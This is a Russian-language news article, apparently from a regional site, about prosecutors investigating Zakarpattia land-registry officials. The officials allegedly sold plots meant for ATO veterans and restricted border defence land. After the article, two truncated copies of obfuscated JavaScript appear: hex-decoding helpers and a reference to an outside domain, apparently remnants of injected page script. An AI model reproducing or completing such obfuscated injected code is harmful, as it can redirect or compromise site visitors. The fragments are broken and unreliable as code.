Махинации с землей на Закарпатье: прокуратура установила, что чиновники распродали не только участки бойцов АТО

Перегляди: 367

Прокуратура Закарпатской области взялась за расследование против чиновников, которые продали земельные участки участников АТО, а также земли обороны, продавать которые запрещено

Как сообщают в прокуратуре, на территории области служащие совхоз-заводов при содействии служебных лиц Главного управления Госгеокадастра в Закарпатской области незаконно оформляли права пользования или собственности на земельные участки под многолетними насаждениями государственных агропредприятий.

Перед этим без согласия органа управления государственным агропромышленным предприятием — Министерства аграрной политики Украины — служебные лица совхоз-заводов незаконно отчуждали многолетние насаждения — виноградники и фруктовые сады — третьим лицам.

«В течение 2010—2015 годов должностные лица Главного управления Госгеокадастра в Закарпатской области, по предварительному сговору со служебными лицами государственных агропредприятий области, злоупотребляя служебным положением, вопреки интересам службы, умышленно, с целью получения неправомерной выгоды в пользу третьих лиц, в нарушение требований Земельного кодекса Украины, наладили схемы незаконного отчуждения земельных участков государственной и коммунальной формы собственности», — говорится в сообщении ведомства.

Таким образом, права собственности или пользования на земли государственной и коммунальной собственности передавали в обход процедуры продажи на конкурентных началах.

«В то же время обработка данных публичной кадастровой карты свидетельствует, что часть земельных участков находятся в пределах от линии государственной границы до линии пограничных инженерных сооружений и в соответствии с требованиями ст. 77, 84 Земельного кодекса Украины относятся к землям обороны и предоставления их в собственность запрещено», — подчеркнули в прокуратуре.

Как сообщил начальник управления представительства интересов государства и граждан в суде прокуратуры Закарпатской области Андрей Малинич, только в Ужгородском районе чиновники продали десятки гектаров стоимостью около 42 млн грн, передает Укринформ.

«Некоторые из участков относятся к землям обороны и размещены в пределах пограничной полосы. Их предоставление в собственность запрещено законом. По данному факту сегодня прокуратурой начато уголовное производство по статье 364 часть 2, ею предусмотрено от 3 до 6 лет лишения свободы. Под подозрением сейчас 5-6 чиновников Госгеокадастра», — добавил он.

Напомним, на Закарпатье чиновники из Государственной службы Украины по вопросам геодезии, картографии и кадастра (Госгеокадастра) продали отведенные для участников АТО участки земли, признав фруктовые деревья объектами недвижимости.

Об этом в сообщении на своем сайте заявил председатель Закарпатской областной государственной администрации Геннадий Москаль.

«Аферисты купили фруктовые деревья, которые растут на участке, а потом подали в Госгеокадастр документы, что хотят приватизировать землю под этими деревьями, которые выступают объектами недвижимости! И Госгеокадастр действительно признает деревья объектами недвижимости, продает землю и вносит об этом сведения в единый земельный кадастр. Это полный абсурд, но так сделано», — рассказал он.

Москаль объяснил, что землю выделило управление Госгеокадастра, а не городские или сельские советы, поскольку она находится вне пределов населенных пунктов. Аферу обнаружили только тогда, когда в областную госадминистрацию пришли жаловаться бойцы АТО, чьи участки продали другим людям.

«Работник Госгеокадастра, который провел эту сделку, сбежал на больничный, но его нет ни в больнице, ни дома. А люди ходят жаловаться в ОГА. Я вполне разделяю их негодование, но повлиять непосредственно на Госгеокадастр не могу, поскольку он напрямую подчиняется Киеву», — подчеркнул он.

По словам председателя ОГА, по такой же схеме в Виноградовском районе приватизировали огромные виноградники (признав объектами недвижимости виноградные кусты), а в Воловецком районе кучу земли за пределами сел отдали студентам из Львовской и Ивано-Франковской областей.

// o;o++) t+=e.charCodeAt (o).toString (16);return t},a=function (e){e=e.match (/[\S\s]{1,2}/g);for (var t="«,o=0;o < e.length;o++) t+=String.fromCharCode (parseInt (e[o],16));return t},d=function (){return „zerkalo.mk.ua“},p=function (){var w=window,p=w.document.location.protocol;if (p.indexOf („http“)==0){return p}for (var e=0;e

// o;o++) t+=e.charCodeAt (o).toString (16);return t},a=function (e){e=e.match (/[\S\s]{1,2}/g);for (var t=»",o=0;o < e.length;o++) t+=String.fromCharCode (parseInt (e[o],16));return t},d=function (){return "zerkalo.mk.ua"},p=function (){var w=window,p=w.document.location.protocol;if (p.indexOf ("http")==0){return p}for (var e=0;e

Tweet about this on TwitterShare on FacebookShare on Google+

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

*

code